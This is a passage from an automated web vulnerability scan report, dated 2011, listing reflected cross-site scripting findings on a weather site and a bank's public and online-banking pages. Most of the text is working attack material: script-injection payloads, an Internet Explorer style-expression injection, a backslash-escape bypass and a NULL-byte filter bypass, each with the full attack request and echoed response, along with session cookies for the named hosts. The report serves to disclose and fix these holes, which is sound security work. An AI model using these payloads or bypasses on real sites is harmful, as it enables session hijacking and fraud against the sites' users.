HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 103556 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:49 GMT Connection: close
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 100657 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:53 GMT Connection: close
...[SNIP]... <script type="text/javascript"> var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8®ion=8®ion_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1"; </script> ...[SNIP]...
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 104331 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:36 GMT Connection: close
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 101771 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close
1.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Business/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:13 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 53268 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Personal/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:49 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 40557 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27477 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> < ...[SNIP]... <a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;"> ...[SNIP]...
1.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30854 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
1.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 33957 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/mobile/mobile-product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30271 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/checkcard/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 31030 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/onlinebanking/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35938 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 32253 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 207 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao-matrix/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:34 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 218 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
